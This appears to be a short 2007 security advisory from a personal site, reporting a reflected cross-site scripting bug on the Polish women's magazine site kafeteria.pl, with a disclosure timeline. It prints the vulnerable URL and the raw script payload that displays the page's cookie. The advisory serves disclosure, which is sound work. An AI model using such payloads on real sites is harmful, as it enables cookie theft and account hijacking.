Zapraszam na bloga o botnetach i złośliwym oprogramowaniu:
bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety
faq
security
public
art
processing
linux moje
tests
linki
stats
start
kaneda@bohater.net
+
Subject:
XSS bug for www.kafeteria.pl
+
Version:
2007.04.09
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
kafeteria.pl Description:
Magazine for Womans (part of o2.pl portal).
+
Description:
XSS IN:
http://kafeteria.pl/prenumerata.php?email_sub=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E
Sent data:
"><script>alert(document.cookie);</script>
Its nothing special, because this site is without any kind of authentication.
Timeline:
2007.04.09 bug discovered
2007.04.09 "/" bug sent via mail from http://kontakt.o2.pl/index.php?help_o2=0&dzial=form&mode=form&cate_id=63
Original Advisory:
http://kaneda.bohater.net/security/20070409-xss-kafeteria.pl.php
Check my other bugs in security section:
Security
